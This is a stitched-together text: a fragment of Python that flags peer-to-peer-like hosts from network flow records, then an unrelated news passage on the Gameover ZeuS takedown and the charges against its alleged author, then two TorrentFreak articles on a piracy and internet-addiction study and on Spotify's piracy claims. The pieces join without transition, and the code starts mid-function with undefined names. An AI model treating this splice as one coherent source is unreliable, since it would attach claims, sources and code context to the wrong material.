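    total, wellknown, udp = defaultdict(int), defaultdict(int), defaultdict(int)
    for f in flows:
        peers[f.src].add(f.dst)
        ports[f.src].add(f.dport)
        total[f.src] += 1
        wellknown[f.src] += f.dport < 1024   # bool adds as 0 or 1
        udp[f.src] += f.proto == "udp"
    return {
        h: {
            "peers": len(peers[h]),
            "ports": len(ports[h]),
            "wellknown_share": wellknown[h] / total[h],
            "udp_share": udp[h] / total[h],
        }
        for h in total
    }


def classify(profile, min_peers=8, min_ports=5, max_wellknown_share=0.25):
    """Label one host profile. Thresholds are illustrative, not tuned values:
    many distinct peers on many distinct high ports is the P2P signature."""
    p2p = (
        profile["peers"] >= min_peers
        and profile["ports"] >= min_ports
        and profile["wellknown_share"] <= max_wellknown_share
    )
    return "p2p-like" if p2p else "not-p2p-like"


def find_p2p_hosts(flows, **thresholds):
    """Return the sorted list of internal hosts whose traffic looks P2P-like."""
    profiles = host_profiles(flows)
    return sorted(h for h, p in profiles.items()
                  if classify(p, **thresholds) == "p2p-like")


if __name__ == "__main__":
    for host, prof in sorted(host_profiles(SAMPLE_FLOWS).items()):
        print(f"{host}: peers={prof['peers']:3d} ports={prof['ports']:3d} "
              f"wellknown={prof['wellknown_share']:.2f} udp={prof['udp_share']:.2f} "
              f"-> {classify(prof)}")
```

A host that beacons to one address on port 443, like 10.0.0.6 in the sample, is invisible to this fan-out heuristic but is exactly the case that domain and IP reputation catches, so the two signals complement each other.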

According to McAfee, the seizure of Gameover is expected to coincide with a cleanup effort in which Internet service providers contact affected customers to help remediate compromised PCs. The Department of Homeland Security’s U.S. Computer Emergency Readiness Team (US-CERT) today published a list of resources that may help in that effort.

Update, 11:07 a.m. ET: The Justice Department just published a complaint (PDF) that names the alleged author of the ZeuS Trojan, allegedly a Russian citizen named Evgeniy Mikhailovich Bogachev. The complaint mentions something that this blog has noted on several occasions: that the ZeuS author used multiple nicknames, including “Slavik” and “Pollingsoon.” More court documents related to today’s action are available here.

Yevgeniy Bogachev, Evgeniy Mikhaylovich Bogachev, a.k.a. “lucky12345”, “slavik”, “Pollingsoon”. Source: FBI.gov “Most Wanted, Cyber”.

TorrentFreak: Research Links Piracy to Internet Addiction and Deviant Friends

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Over the past decade a lot of research has looked at the effects of online piracy, particularly on the revenues of various entertainment industries.

Increasingly researchers are also examining the sociological links, causes and effects of copyright infringement. A new study conducted by Tennessee Tech University’s Jordana Navarro is a good example.

With a large survey Navarro and her colleagues investigated the link between piracy, internet addiction and deviant tendencies. The results were published in an article titled “Addicted to pillaging in cyberspace: Investigating the role of internet addiction in digital piracy,” which appears in the latest issue of the Computers and Human Behavior journal.

The researchers conducted a large-scale survey among 1,617 students from 9th through 12th grade. The participants were asked a wide range of questions, covering their piracy habits, as well as scales to measure Internet addiction and association with deviant friends.

The findings on the piracy side are comparable to many previous studies and show that movie piracy is most prevalent. Nearly 30% of the students admitted to pirating movies, and this percentage went down to 15% and 13% for music and software piracy respectively.

One of the more interesting findings is the link between piracy and Internet addiction. Here, the researchers found that students who have more internet addiction related issues are more likely to pirate software.

“Based on the results of the study, we can determine that high school students who have Internet-related problems due to addiction are more likely to commit a specific form of piracy involving the illegal downloading of software,” the researchers write.

The same group of software pirates were also more likely to hang out with deviant friends. This measure includes friends who pirate, those who threaten others with violence online, those who send nude pictures, and those who have used another person’s credit card or ID without permission.

“Not surprisingly, youth who committed this form of piracy were also more likely to have deviant peers. In other words, their behaviors were influenced by friends who committed similar or other deviant acts,” the researchers conclude.

Interestingly, the link between Internet addiction and copyright infringement was only found for software piracy. High school students who pirated movies and music were not more likely to have this type of problem. They were, however, more likely to associate with deviant or criminal friends.

“The remaining two forms of piracy for juveniles are not predicted by Internet addiction based on our findings. However, the results did support past findings that deviant peer association and piracy behaviors are significantly related,” the researchers write.

According to the researchers the results are a good first step in identifying how various problems and deviant behaviors are linked, which could be helpful to shape future educational efforts.

Unfortunately, the paper doesn’t offer any explanations for the differences in the link between Internet addiction and various types of piracy. One likely explanation is that those who show more signs of Internet addiction simply spend more time on the computer, and are therefore more interested in software piracy and software in general.

For now, it appears that some more follow-up research is needed before it’s warranted to send the first batch of kids to piracy rehab.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Spotify: We Make Revenue From Pirates Who Never Pay

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

In the continuing piracy debate one thing has been established beyond reasonable doubt. If an entertainment producer wants to make any dent in piracy, at the very least they’re going to have to make their products readily available at a fair price.

This argument has gathered serious momentum in Australia during the past few years, with local consumers regularly criticizing international TV and movie companies for shipping products Down Under months after release and then charging unrealistic prices.

But in a recent opinion piece, the principal analyst at local music royalty collection outfit APRA AMCOS disputed whether the arrival of services like Spotify, which give consumers what they want, has actually done anything to reduce piracy rates.

“Music’s had everything everybody now wants for television shows, such as Game of Thrones, for a couple of years: availability, access and a reasonable price. But the piracy issue still has not been solved,” Andrew Harris wrote.

“In fact, results last month from our ongoing national research show that music piracy levels – just as they were almost two years ago – still sit at around the same level as that of movies and television shows.”

Noting that Spotify offers content in Australia at the moment it’s released around the world and does so at one of the best prices, Harris arrives at a familiar conclusion.

“We’ve heard it all before. No matter how loud the minority might shout it in anger as the answer, it’s impossible to compete with free.”

Unsurprisingly that notion doesn’t sit well with Spotify, a company that was designed from the ground up to compete with piracy.

Responding to Harris’s assertions in Australian Financial Review, Spotify Australia and New Zealand chief Kate Vale said that the company’s experiences told a different story.

“We do believe that access, availability and price does contribute and is the answer and we have proven this in other markets across Europe and particularly in Sweden where we have seen a 30 per cent reduction in piracy since we launched about six years ago,” Vale said.

Cracking Sweden was undoubtedly a major feat given the country’s long association with Internet piracy and Vale believes that Spotify now has the right formula to attract the most aggressive file-sharers – and make money from them.

“If you look at the main audience that is on Spotify, a lot of them are former pirates. There are teenagers who have potentially never paid for their music before, and probably never will,” she said.

“If we can get them on to a service that is free but legal, and they are contributing through our advertising on that free tier, then it is giving money back into the industry that they are just never going to get before.”

The ad-supported tier of Spotify is undoubtedly a great incentive to get people to try the service. Globally the company says that it converts around a quarter of free users to premium subscribers but Australia actually tops that with 31%, suggesting that Aussies are happier than most to part with their hard-earned cash in exchange for a good product.
